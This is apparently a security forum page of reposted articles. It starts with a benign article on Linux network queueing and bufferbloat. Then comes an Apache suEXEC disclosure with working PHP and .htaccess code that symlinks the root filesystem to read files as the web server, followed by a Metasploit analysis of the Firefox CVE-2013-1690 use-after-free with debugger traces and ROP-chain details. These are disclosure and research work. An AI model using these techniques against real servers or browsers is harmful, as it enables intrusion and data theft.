Recall from earlier that the driver queue contains a fixed number of descriptors which each point to packets of varying sizes. Since TSO, UFO and GSO allow for much larger packets, these optimizations have the side effect of greatly increasing the number of bytes which can be queued in the driver queue. Figure 3 illustrates this concept in contrast with Figure 2.

Figure 3 – Large packets can be sent to the NIC when TSO, UFO or GSO are enabled. This can greatly increase the number of bytes in the driver queue.

While the rest of this article focuses on the transmit path, it is worth noting that Linux also has receive-side optimizations which operate similarly to TSO, UFO and GSO. These optimizations also have the goal of reducing per-packet overhead. Specifically, generic receive offload (GRO) allows the NIC driver to combine received packets into a single large packet which is then passed to the IP stack. When forwarding packets, GRO allows the original packets to be reconstructed, which is necessary to maintain the end-to-end nature of IP packets. However, there is one side effect: when the large packet is broken up on the transmit side of the forwarding operation, it results in several packets for the flow being queued at once. This 'micro-burst' of packets can negatively impact inter-flow latencies.

Starvation and Latency

Despite its necessity and benefits, the queue between the IP stack and the hardware introduces two problems: starvation and latency. If the NIC driver wakes to pull packets off of the queue for transmission and the queue is empty, the hardware will miss a transmission opportunity, thereby reducing the throughput of the system. This is referred to as starvation. Note that an empty queue when the system does not have anything to transmit is not starvation – this is normal.
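To make the starvation trade-off concrete, here is a toy discrete-time model (entirely made-up numbers, not kernel code): the NIC drains one packet per tick, while a busy stack only gets to refill the queue every few ticks even though a backlog is always waiting.

```python
def starved_slots(queue_depth, ticks=1000, refill_every=4):
    """Toy model of the driver queue: the NIC drains one packet per tick,
    but a busy IP stack only refills the queue every `refill_every` ticks
    (there is always more backlog to send). A tick where the NIC finds the
    queue empty despite pending backlog is a starved slot."""
    queued = 0
    starved = 0
    for tick in range(ticks):
        if tick % refill_every == 0:
            queued = queue_depth   # stack fills the queue when it gets CPU time
        if queued > 0:
            queued -= 1            # NIC transmits one packet
        else:
            starved += 1           # missed transmission opportunity
    return starved

print(starved_slots(queue_depth=2))   # shallow queue: many starved slots
print(starved_slots(queue_depth=8))   # deeper queue: no starvation here
```

With a depth of 2 the NIC idles half the time between refills; a depth of 8 rides out the gaps entirely, which is exactly the argument for large buffers made in the next paragraph.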
The complication associated with avoiding starvation is that the IP stack, which fills the queue, and the hardware driver, which drains it, run asynchronously. Worse, the duration between fill or drain events varies with the load on the system and external conditions such as the network interface's physical medium. For example, on a busy system the IP stack will get fewer opportunities to add packets to the buffer, which increases the chance that the hardware will drain the buffer before more packets are queued. For this reason it is advantageous to have a very large buffer to reduce the probability of starvation and to ensure high throughput.

While a large queue is necessary for a busy system to maintain high throughput, it has the downside of allowing for the introduction of a large amount of latency.

Figure 4 – Interactive packet (yellow) behind bulk flow packets (blue)

Figure 4 shows a driver queue which is almost full with TCP segments for a single high-bandwidth, bulk traffic flow (blue). Queued last is a packet from a VoIP or gaming flow (yellow). Interactive applications like VoIP or gaming typically emit small packets at fixed intervals which are latency sensitive, while a high-bandwidth data transfer generates a higher packet rate and larger packets. This higher packet rate can fill the buffer between interactive packets, causing the transmission of the interactive packet to be delayed.

To further illustrate this behaviour, consider a scenario based on the following assumptions:

- A network interface capable of transmitting at 5 Mbit/sec (5,000,000 bits/sec).
- Each packet from the bulk flow is 1,500 bytes (12,000 bits).
- Each packet from the interactive flow is 500 bytes.
- The depth of the queue is 128 descriptors.
- There are 127 bulk data packets and 1 interactive packet, queued last.
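Plugging these assumptions into a couple of lines gives a back-of-the-envelope check of the drain time (just arithmetic, not kernel behaviour):

```python
LINK_RATE_BPS = 5_000_000      # 5 Mbit/s link
BULK_PACKET_BITS = 1_500 * 8   # 12,000 bits per bulk packet
QUEUED_BULK_PACKETS = 127      # bulk packets ahead of the interactive one

drain_seconds = QUEUED_BULK_PACKETS * BULK_PACKET_BITS / LINK_RATE_BPS
print(f"{drain_seconds * 1000:.1f} ms")  # prints "304.8 ms"
```

Roughly 305 ms of queueing delay before the interactive packet even reaches the wire.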
Given the above assumptions, the time required to drain the 127 bulk packets and create a transmission opportunity for the interactive packet is (127 * 12,000) / 5,000,000 = 0.304 seconds (304 milliseconds for those who think of latency in terms of ping results). This amount of latency is well beyond what is acceptable for interactive applications, and it does not even represent the complete round-trip time – it is only the time required to transmit the packets queued before the interactive one. As described earlier, the size of the packets in the driver queue can be larger than 1,500 bytes if TSO, UFO or GSO are enabled. This makes the latency problem correspondingly worse.

Large latencies introduced by oversized, unmanaged buffers are known as Bufferbloat. For a more detailed explanation of this phenomenon see Controlling Queue Delay and the Bufferbloat project.

As the above discussion illustrates, choosing the correct size for the driver queue is a Goldilocks problem – it can't be too small or throughput suffers, and it can't be too big or latency suffers.

Byte Queue Limits (BQL)

Byte Queue Limits (BQL) is a new feature in recent Linux kernels (> 3.3.0) which attempts to solve the problem of driver queue sizing automatically. This is accomplished by adding a layer which enables and disables queueing to the driver queue based on calculating the minimum buffer size required to avoid starvation under the current system conditions. Recall from earlier that the smaller the amount of queued data, the lower the maximum latency experienced by queued packets.

It is key to understand that the actual size of the driver queue is not changed by BQL. Rather, BQL calculates a limit on how much data (in bytes) can be queued at the current time. Any bytes over this limit must be held or dropped by the layers above the driver queue.

The BQL mechanism operates when two events occur: when packets are enqueued to the driver queue and when a transmission to the wire has completed.
A simplified version of the BQL algorithm is outlined below. LIMIT refers to the value calculated by BQL.

****
** After adding packets to the queue
****
if the number of queued bytes is over the current LIMIT value then
    disable the queueing of more data to the driver queue

Notice that the amount of queued data can exceed LIMIT because data is queued before the LIMIT check occurs. Since a large number of bytes can be queued in a single operation when TSO, UFO or GSO are enabled, these throughput optimizations have the side effect of allowing a higher than desirable amount of data to be queued. If you care about latency you probably want to disable these features. See later parts of this article for how to accomplish this.

The second stage of BQL is executed after the hardware has completed a transmission (simplified pseudo-code):

****
** When the hardware has completed sending a batch of packets
** (Referred to as the end of an interval)
****
if the hardware was starved in the interval
    increase LIMIT
else if the hardware was busy during the entire interval (not starved)
        and there are bytes to transmit
    decrease LIMIT by the number of bytes not transmitted in the interval

if the number of queued bytes is less than LIMIT
    enable the queueing of more data to the buffer

As you can see, BQL is based on testing whether the device was starved. If it was starved, then LIMIT is increased, allowing more data to be queued, which reduces the chance of starvation. If the device was busy for the entire interval and there are still bytes to be transferred in the queue, then the queue is bigger than necessary for the system under the current conditions and LIMIT is decreased to constrain the latency.

A real-world example may help provide a sense of how much BQL affects the amount of data which can be queued. On one of my servers the driver queue size defaults to 256 descriptors.
Since the Ethernet MTU is 1,500 bytes, this means up to 256 * 1,500 = 384,000 bytes can be queued to the driver queue (TSO, GSO etc. are disabled, or this would be much higher). However, the limit value calculated by BQL is 3,012 bytes. As you can see, BQL greatly constrains the amount of data which can be queued.

An interesting aspect of BQL can be inferred from the first word in the name – byte. Unlike the size of the driver queue and most other packet queues, BQL operates on bytes. This is because the number of bytes has a more direct relationship with the time required to transmit to the physical medium than the number of packets or descriptors, since the latter are variably sized.

BQL reduces network latency by limiting the amount of queued data to the minimum required to avoid starvation. It also has the very important side effect of moving the point where most packets are queued from the driver queue, which is a simple FIFO, to the queueing discipline (QDisc) layer, which is capable of implementing much more complicated queueing strategies. The next section introduces the Linux QDisc layer.

Queueing Disciplines (QDisc)

The driver queue is a simple first-in, first-out (FIFO) queue. It treats all packets equally and has no capability for distinguishing between packets of different flows. This design keeps the NIC driver software simple and fast. Note that more advanced Ethernet and most wireless NICs support multiple independent transmission queues, but similarly each of these queues is typically a FIFO. A higher layer is responsible for choosing which transmission queue to use.

Sandwiched between the IP stack and the driver queue is the queueing discipline (QDisc) layer (see Figure 1). This layer implements the traffic management capabilities of the Linux kernel, which include traffic classification, prioritization and rate shaping. The QDisc layer is configured through the somewhat opaque tc command.
There are three key concepts to understand in the QDisc layer: QDiscs, classes and filters.

The QDisc is the Linux abstraction for traffic queues which are more complex than the standard FIFO queue. This interface allows the QDisc to carry out complex queue management behaviours without requiring the IP stack or the NIC driver to be modified. By default every network interface is assigned a pfifo_fast QDisc, which implements a simple three-band prioritization scheme based on the TOS bits. Despite being the default, the pfifo_fast QDisc is far from the best choice because it defaults to having very deep queues (see txqueuelen below) and is not flow aware.

The second concept, which is closely related to the QDisc, is the class. Individual QDiscs may implement classes in order to handle subsets of the traffic differently. For example, the Hierarchical Token Bucket (HTB) QDisc allows the user to configure 500 Kbps and 300 Kbps classes and direct traffic to each as desired. Not all QDiscs have support for multiple classes – those that do are referred to as classful QDiscs.

Filters (also called classifiers) are the mechanism used to classify traffic to a particular QDisc or class. There are many different types of filters of varying complexity: u32 is the most general, and the flow filter is perhaps the easiest to use. The documentation for the flow filter is lacking, but you can find an example in one of my QoS scripts.

For more detail on QDiscs, classes and filters see the LARTC HOWTO and the tc man pages.

Buffering between the transport layer and the queueing disciplines

In looking at the previous figures you may have noticed that there are no packet queues above the queueing discipline layer. What this means is that the network stack places packets directly into the queueing discipline or else pushes back on the upper layers (e.g. the socket buffer) if the queue is full. The obvious question that follows is: what happens when the stack has a lot of data to send?
This could occur as the result of a TCP connection with a large congestion window or, even worse, an application sending UDP packets as fast as it can. The answer is that for a QDisc with a single queue, the same problem outlined in Figure 4 for the driver queue occurs. That is, a single high-bandwidth or high-packet-rate flow can consume all of the space in the queue, causing packet loss and adding significant latency to other flows. Even worse, this creates another point of buffering where a standing queue can form, which increases latency and causes problems for TCP's RTT and congestion window size calculations. Since Linux defaults to the pfifo_fast QDisc, which effectively has a single queue (because most traffic is marked with TOS=0), this phenomenon is not uncommon.

As of Linux 3.6.0 (2012-09-30), the Linux kernel has a new feature called TCP Small Queues which aims to solve this problem for TCP. TCP Small Queues adds a per-TCP-flow limit on the number of bytes which can be queued in the QDisc and driver queue at any one time. This has the interesting side effect of causing the kernel to push back on the application earlier, which allows the application to more effectively prioritize writes to the socket. At present (2012-12-28) it is still possible for single flows from other transport protocols to flood the QDisc layer.

Another partial solution to the transport layer flood problem, one which is transport layer agnostic, is to use a QDisc which has many queues, ideally one per network flow. Both the Stochastic Fairness Queueing (SFQ) and Fair Queueing with Controlled Delay (fq_codel) QDiscs fit this problem nicely as they effectively have a queue per network flow.

How to manipulate the queue sizes in Linux

Driver Queue

The ethtool command is used to control the driver queue size for Ethernet devices. ethtool also provides low-level interface statistics as well as the ability to enable and disable IP stack and driver features.
The -g flag to ethtool displays the driver queue (ring) parameters:

[root@alpha net-next]# ethtool -g eth0
Ring parameters for eth0:
Pre-set maximums:
RX:        16384
RX Mini:   0
RX Jumbo:  0
TX:        16384
Current hardware settings:
RX:        512
RX Mini:   0
RX Jumbo:  0
TX:        256

You can see from the above output that the driver for this NIC defaults to 256 descriptors in the transmission queue. Early in the Bufferbloat investigation it was often recommended to reduce the size of the driver queue in order to reduce latency. With the introduction of BQL (assuming your NIC driver supports it) there is no longer any reason to modify the driver queue size (see below for how to configure BQL).

ethtool also allows you to manage optimization features such as TSO, UFO and GSO. The -k flag displays the current offload settings and -K modifies them.

[dan@alpha ~]$ ethtool -k eth0
Offload parameters for eth0:
rx-checksumming: off
tx-checksumming: off
scatter-gather: off
tcp-segmentation-offload: off
udp-fragmentation-offload: off
generic-segmentation-offload: off
generic-receive-offload: on
large-receive-offload: off
rx-vlan-offload: off
tx-vlan-offload: off
ntuple-filters: off
receive-hashing: off

Since TSO, GSO, UFO and GRO greatly increase the number of bytes which can be queued in the driver queue, you should disable these optimizations if you want to optimize for latency over throughput. It's doubtful you will notice any CPU impact or throughput decrease when disabling these features unless the system is handling very high data rates.

Byte Queue Limits (BQL)

The BQL algorithm is self-tuning so you probably don't need to mess with this too much. However, if you are concerned about optimal latencies at low bitrates then you may want to override the upper limit on the calculated LIMIT value. BQL state and configuration can be found in a /sys directory based on the location and name of the NIC.
On my server the directory for eth0 is:

/sys/devices/pci0000:00/0000:00:14.0/net/eth0/queues/tx-0/byte_queue_limits

The files in this directory are:

- hold_time: Time between modifications of LIMIT, in milliseconds.
- inflight: The number of queued but not yet transmitted bytes.
- limit: The LIMIT value calculated by BQL. 0 if BQL is not supported in the NIC driver.
- limit_max: A configurable maximum value for LIMIT. Set this value lower to optimize for latency.
- limit_min: A configurable minimum value for LIMIT. Set this value higher to optimize for throughput.

To place a hard upper limit on the number of bytes which can be queued, write the new value to the limit_max file:

echo "3000" > limit_max

What is txqueuelen?

Often in early Bufferbloat discussions the idea of statically reducing the NIC transmission queue was mentioned. The current size of the transmission queue can be obtained from the ip and ifconfig commands. Confusingly, these commands name the transmission queue length differently (bold text):

[dan@alpha ~]$ ifconfig eth0
eth0  Link encap:Ethernet HWaddr 00:18:F3:51:44:10
      inet addr:69.41.199.58 Bcast:69.41.199.63 Mask:255.255.255.248
      inet6 addr: fe80::218:f3ff:fe51:4410/64 Scope:Link
      UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
      RX packets:435033 errors:0 dropped:0 overruns:0 frame:0
      TX packets:429919 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:65651219 (62.6 MiB) TX bytes:132143593 (126.0 MiB)
      Interrupt:23

[dan@alpha ~]$ ip link
1: lo: mtu 16436 qdisc noqueue state UNKNOWN
   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000
   link/ether 00:18:f3:51:44:10 brd ff:ff:ff:ff:ff:ff

The length of the transmission queue in Linux defaults to 1,000 packets, which is a large amount of buffering, especially at low bandwidths. The interesting question is what exactly this variable controls. This wasn't clear to me so I spent some time spelunking in the kernel source.
From what I can tell, txqueuelen is only used as a default queue length for some of the queueing disciplines. Specifically:

- pfifo_fast (Linux default queueing discipline)
- sch_fifo
- sch_gred
- sch_htb (only for the default queue)
- sch_plug
- sch_sfb
- sch_teql

Looking back at Figure 1, the txqueuelen parameter controls the size of the queues in the Queueing Discipline box for the QDiscs listed above. For most of these queueing disciplines, the "limit" argument on the tc command line overrides the txqueuelen default. In summary, if you do not use one of the above queueing disciplines or if you override the queue length, then the txqueuelen value is meaningless.

As an aside, I find it a little confusing that the ifconfig command shows low-level details of the network interface, such as the MAC address, while the txqueuelen parameter refers to the higher-level QDisc layer. It would seem more appropriate for ifconfig to show the driver queue size.

The length of the transmission queue is configured with the ip or ifconfig commands:

[root@alpha dan]# ip link set txqueuelen 500 dev eth0

Notice that the ip command uses "txqueuelen" but when displaying the interface details it uses "qlen" – another unfortunate inconsistency.

Queueing Disciplines

As introduced earlier, the Linux kernel has a large number of queueing disciplines (QDiscs), each of which implements its own packet queues and behaviour. Describing the details of how to configure each of the QDiscs is out of scope for this article. For full details see the tc man page (man tc). You can find details for each QDisc in 'man tc qdisc-name' (e.g. 'man tc htb' or 'man tc fq_codel'). LARTC is also a very useful resource but is missing information on newer features.

Below are a few tips and tricks related to the tc command that may be helpful:

- The HTB QDisc implements a default queue which receives all packets if they are not classified with filter rules.
- Some other QDiscs, such as DRR, simply black-hole traffic that is not classified. To see how many packets were not classified properly and were directly queued into the default HTB class, see direct_packets_stat in "tc qdisc show".
- The HTB class hierarchy is only useful for classification, not bandwidth allocation. All bandwidth allocation occurs by looking at the leaves and their associated priorities.
- The QDisc infrastructure identifies QDiscs and classes with major and minor numbers which are separated by a colon. The major number is the QDisc identifier and the minor number is the class within that QDisc. The catch is that the tc command uses a hexadecimal representation of these numbers on the command line. Since many strings are valid in both hex and decimal (e.g. 10), many users don't even realize that tc uses hex. See one of my tc scripts for how I deal with this.
- If you are using ADSL, which is ATM based (most DSL services are ATM based, but newer variants such as VDSL2 are not always), you probably want to add the "linklayer adsl" option. This accounts for the overhead which comes from breaking IP packets into a bunch of 53-byte ATM cells.
- If you are using PPPoE then you probably want to account for the PPPoE overhead with the 'overhead' parameter.

TCP Small Queues

The per-socket TCP queue limit can be viewed and controlled with the following /proc file:

/proc/sys/net/ipv4/tcp_limit_output_bytes

My understanding is that you should not need to modify this value in any normal situation.

Oversized Queues Outside Of Your Control

Unfortunately, not all of the oversized queues which will affect your Internet performance are under your control. Most commonly the problem will lie in the device which attaches to your service provider (e.g. a DSL or cable modem) or in the service provider's equipment itself. In the latter case there isn't much you can do because there is no way to control the traffic which is sent towards you.
However, in the upstream direction you can shape the traffic to slightly below the link rate. This will stop the queue in the device from ever holding more than a couple of packets. Many residential home routers have a rate limit setting which can be used to shape below the link rate. If you are using a Linux box as a router, shaping below the link rate also allows the kernel's queueing features to be effective. You can find many example tc scripts online, including the one I use, with some related performance results.

Summary

Queueing in packet buffers is a necessary component of any packet network, both within a device and across network elements. Properly managing the size of these buffers is critical to achieving good network latency, especially under load. While static buffer sizing can play a role in decreasing latency, the real solution is intelligent management of the amount of queued data. This is best accomplished through dynamic schemes such as BQL and active queue management (AQM) techniques like CoDel. This article outlined where packets are queued in the Linux network stack, how features related to queueing are configured, and provided some guidance on how to achieve low latency.

Related Links

- Controlling Queue Delay – A fantastic explanation of network queueing and an introduction to the CoDel algorithm.
- Presentation of CoDel at the IETF – Basically a video version of the Controlling Queue Delay article.
- Bufferbloat: Dark Buffers in the Internet – An early Bufferbloat article.
- Linux Advanced Routing and Traffic Control Howto (LARTC) – Probably still the best documentation of the Linux tc command, although it's somewhat out of date with respect to new features such as fq_codel.
- TCP Small Queues on LWN
- Byte Queue Limits on LWN

Thanks

Thanks to Kevin Mason, Simon Barber, Lucas Fontes and Rami Rosen for reviewing this article and providing helpful feedback.

Sursa: Queueing in the Linux Network Stack | Dan Siemon
  18. Yes, do send us a PM with the IPs from which you cannot access the forum, because we are having some minor technical problems with the crystal balls we were using...
  19. [h=1]Apache suEXEC Privilege Elevation / Information Disclosure[/h]

Apache suEXEC privilege elevation / information disclosure
Discovered by Kingcope/Aug 2013

The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can considerably reduce the security risks involved with allowing users to develop and run private CGI or SSI programs.

With this bug, an attacker who is able to run PHP or CGI code inside a web hosting environment that is configured to use suEXEC as a protection mechanism can read any file and directory on the filesystem of the UNIX/Linux system with the user and group ID of the Apache web server. Normally PHP and CGI scripts are not allowed to read files with the Apache user ID inside a suEXEC-configured environment.

Take for example this Apache-owned file and the PHP script that follows.

$ ls -la /etc/testapache
-rw------- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache

Only user www-data should be able to read this file.

$ cat test.php
<?php
system("id; cat /etc/testapache");
?>

When calling the PHP file using a web browser it will show...

uid=1002(example) gid=1002(example) groups=1002(example)

...because the PHP script is run through suEXEC. The script will not output the file requested because of a permissions error.

Now if we create a .htaccess file with the content...

Options Indexes FollowSymLinks

...and a PHP script with the content...

<?php
system("ln -sf / test99.php");
symlink("/", "test99.php"); // try the builtin function in case system() is blocked
?>

...in the same folder, we can access the root filesystem with the Apache UID and GID by requesting test99.php. The above PHP script will simply create a symbolic link to '/'.
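The symlink escape at the heart of this technique can be demonstrated generically, outside Apache entirely. This sketch uses hypothetical paths in a temp directory (no suEXEC involved); it only illustrates why a link pointing above the web root exposes everything under its target:

```python
import os
import tempfile

# Hypothetical layout: a "web root" plus a secret file outside it.
base = tempfile.mkdtemp()
os.makedirs(os.path.join(base, "webroot"))
secret = os.path.join(base, "secret.txt")          # outside the web root
with open(secret, "w") as f:
    f.write("apache-readable data")

# Equivalent of `ln -sf <parent> test99` inside the web root.
link = os.path.join(base, "webroot", "test99")
os.symlink(base, link)

# A request like test99/secret.txt resolves straight through the link,
# escaping the web root:
with open(os.path.join(link, "secret.txt")) as f:
    leaked = f.read()
print(leaked)
```

In the Apache case the same resolution happens server-side, with the web server's own UID/GID, which is what makes the bug an information disclosure.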
A request to test99.php/etc/testapache done with a web browser shows... voila! The file is read with the Apache UID/GID. The reason we can now read out any files and traverse directories owned by the Apache user is that Apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case.

Version notes: it is assumed that all Apache versions are affected by this bug.

apache2 -V
Server version: Apache/2.2.22 (Debian)
Server built: Mar 4 2013 21:32:32
Server's Module Magic Number: 20051115:30
Server loaded: APR 1.4.6, APR-Util 1.4.1
Compiled using: APR 1.4.6, APR-Util 1.4.1
Architecture: 32-bit
Server MPM: Worker
  threaded: yes (fixed thread count)
  forked: yes (variable process count)
Server compiled with....
 -D APACHE_MPM_DIR="server/mpm/worker"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_SYSVSEM_SERIALIZE
 -D APR_USE_PTHREAD_SERIALIZE
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D DYNAMIC_MODULE_LIMIT=128
 -D HTTPD_ROOT="/etc/apache2"
 -D SUEXEC_BIN="/usr/lib/apache2/suexec"
 -D DEFAULT_PIDLOG="/var/run/apache2.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="mime.types"
 -D SERVER_CONFIG_FILE="apache2.conf"

Cheers,
/Kingcope

Sursa: Apache suEXEC Privilege Elevation / Information Disclosure
  20. Here's that FBI Firefox Exploit for You (CVE-2013-1690)

Posted by sinn3r in Metasploit on Aug 7, 2013 5:02:42 PM

Hello fellow hackers, I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you. During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI to identify users of Tor as part of a crackdown on child pornography. The security community was amazing: within hours, we found more information such as a brief analysis of the payload, a simplified PoC, the bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability.

Brief Analysis

The vulnerability was originally discovered and reported by researcher "nils". You can see his discussion about the bug on Twitter. A proof-of-concept can be found here. We began with a crash with a modified version of the PoC:

eax=72622f2f ebx=000b2440 ecx=0000006e edx=00000000 esi=07adb980 edi=065dc4ac
eip=014c51ed esp=000b2350 ebp=000b2354 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
xul!DocumentViewerImpl::Stop+0x58:
014c51ed 8b08 mov ecx,dword ptr [eax] ds:0023:72622f2f=????????

EAX is a value from ESI. One way to track where this allocation came from is by putting a breakpoint at moz_xmalloc:

...
bu mozalloc!moz_xmalloc+0xc "r $t0=poi(esp+c); .if (@$t0==0xc4) {.printf \"Addr=0x%08x, Size=0x%08x\",eax, @$t0; .echo; k; .echo}; g"
...
Addr=0x07adb980, Size=0x000000c4
ChildEBP RetAddr
0012cd00 014ee6b1 mozalloc!moz_xmalloc+0xc [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\memory\mozalloc\mozalloc.cpp @ 57]
0012cd10 013307db xul!NS_NewContentViewer+0xe [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer

The call stack tells us this was allocated in nsdocumentviewer.cpp, at line 497, which leads to the following function.
When the DocumentViewerImpl object is created while the page is being loaded, this also triggers a malloc() with size 0xC4 to store it:

nsresult
NS_NewContentViewer(nsIContentViewer** aResult)
{
    *aResult = new DocumentViewerImpl();
    NS_ADDREF(*aResult);
    return NS_OK;
}

In the PoC, window.stop(), which is meant to stop document parsing, is called repeatedly, but the calls don't actually terminate; they just hang. Eventually this leads to some sort of exhaustion that allows the script to continue, and the DocumentViewerImpl object lives on. And then we arrive at the next line: ownerDocument.write(). The ownerDocument.write() function is used to write to the parent frame, but its real purpose here is to trigger xul!nsDocShell::Destroy, which deletes the DocumentViewerImpl:

Free DocumentViewerImpl at: 0x073ab940
ChildEBP RetAddr
000b0b84 01382f42 xul!DocumentViewerImpl::`scalar deleting destructor'+0x10
000b0b8c 01306621 xul!DocumentViewerImpl::Release+0x22 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer.cpp @ 548]
000b0bac 01533892 xul!nsDocShell::Destroy+0x14f [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\docshell\base\nsdocshell.cpp @ 4847]
000b0bc0 0142b4cc xul!nsFrameLoader::Finalize+0x29 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsframeloader.cpp @ 579]
000b0be0 013f4ebd xul!nsDocument::MaybeInitializeFinalizeFrameLoaders+0xec [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 5481]
000b0c04 0140c444 xul!nsDocument::EndUpdate+0xcd [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 4020]
000b0c14 0145f318 xul!mozAutoDocUpdate::~mozAutoDocUpdate+0x34 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\mozautodocupdate.h @ 35]
000b0ca4 014ab5ab xul!nsDocument::ResetToURI+0xf8 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2149]
000b0ccc 01494a8b xul!nsHTMLDocument::ResetToURI+0x20 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 287]
000b0d04 014d583a xul!nsDocument::Reset+0x6b [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2088]
000b0d18 01c95c6f xul!nsHTMLDocument::Reset+0x12 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 274]
000b0f84 016f6ddd xul!nsHTMLDocument::Open+0x736 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1523]
000b0fe0 015015f0 xul!nsHTMLDocument::WriteCommon+0x22a4c7 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1700]
000b0ff4 015e6f2e xul!nsHTMLDocument::Write+0x1a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1749]
000b1124 00ae1a59 xul!nsIDOMHTMLDocument_Write+0x537 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\obj-firefox\js\xpconnect\src\dom_quickstubs.cpp @ 13705]
000b1198 00ad2499 mozjs!js::InvokeKernel+0x59 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 352]
000b11e8 00af638a mozjs!js::Invoke+0x209 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 396]
000b1244 00a9ef36 mozjs!js::CrossCompartmentWrapper::call+0x13a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jswrapper.cpp @ 736]
000b1274 00ae2061 mozjs!JSScript::ensureRanInference+0x16 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinferinlines.h @ 1584]
000b12e8 00ad93fd mozjs!js::InvokeKernel+0x661 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 345]

What happens next is that after the ownerDocument.write() finishes, one of the window.stop() calls that used to hang begins to finish up, which brings us to xul!nsDocumentViewer::Stop. This function then accesses the freed memory, and crashes.
At this point you might see two different racy crashes: either it's accessing some memory that doesn't seem to be meant for that CALL, just because that part of memory happens to fit in there; or you crash at mov ecx, dword ptr [eax], like the following:

0:000> r
eax=41414141 ebx=000b4600 ecx=0000006c edx=00000000 esi=0497c090 edi=067a24ac
eip=014c51ed esp=000b4510 ebp=000b4514 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
xul!DocumentViewerImpl::Stop+0x58:
014c51ed 8b08            mov     ecx,dword ptr [eax]  ds:0023:41414141=????????

0:000> u . L3
014c51ed 8b08            mov     ecx,dword ptr [eax]
014c51ef 50              push    eax
014c51f0 ff5104          call    dword ptr [ecx+4]

However, note that the crash doesn't necessarily have to end up in xul!nsDocumentViewer::Stop, because in order to end up in this code path, two conditions must be met, as the following demonstrates:

DocumentViewerImpl::Stop(void)
{
    NS_ASSERTION(mDocument, "Stop called too early or too late");
    if (mDocument) {
        mDocument->StopDocumentLoad();
    }

    if (!mHidden && (mLoaded || mStopped) && mPresContext && !mSHEntry)
        mPresContext->SetImageAnimationMode(imgIContainer::kDontAnimMode);

    mStopped = true;

    if (!mLoaded && mPresShell) {
        // These are the two conditions that must be met
        // If you're here, you will crash
        nsCOMPtr<nsIPresShell> shellDeathGrip(mPresShell);
        mPresShell->UnsuppressPainting();
    }

    return NS_OK;
}

We discovered the above possibility because the exploit in the wild uses a different path to "call dword ptr [eax+4BCh]" in the function nsIDOMHTMLElement_GetInnerHTML, meaning that it actually survives xul!nsDocumentViewer::Stop. It's also using an information leak to properly craft an NTDLL ROP chain specifically for Windows 7.
The following example, based on the exploit in the wild, should demonstrate this; we begin with the stack pivot:

eax=120a4018 ebx=002ec00c ecx=002ebf68 edx=00000001 esi=120a3010 edi=00000001
eip=66f05c12 esp=002ebf54 ebp=002ebf8c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
xul!xpc_LocalizeContext+0x3ca3f:
66f05c12 ff90bc040000    call    dword ptr [eax+4BCh] ds:0023:120a44d4=33776277

We can see that the pivot is an XCHG EAX,ESP from NTDLL:

0:000> u 77627733 L6
ntdll!__from_strstr_to_strchr+0x9b:
77627733 94              xchg    eax,esp
77627734 5e              pop     esi
77627735 5f              pop     edi
77627736 8d42ff          lea     eax,[edx-1]
77627739 5b              pop     ebx
7762773a c3              ret

After pivoting, it goes through the whole NTDLL ROP chain, which calls ntdll!ZwProtectVirtualMemory to bypass DEP, and then finally gains code execution:

0:000> dd /c1 esp L9
120a4024  77625f18 ; ntdll!ZwProtectVirtualMemory
120a4028  120a5010
120a402c  ffffffff
120a4030  120a4044
120a4034  120a4040
120a4038  00000040
120a403c  120a4048
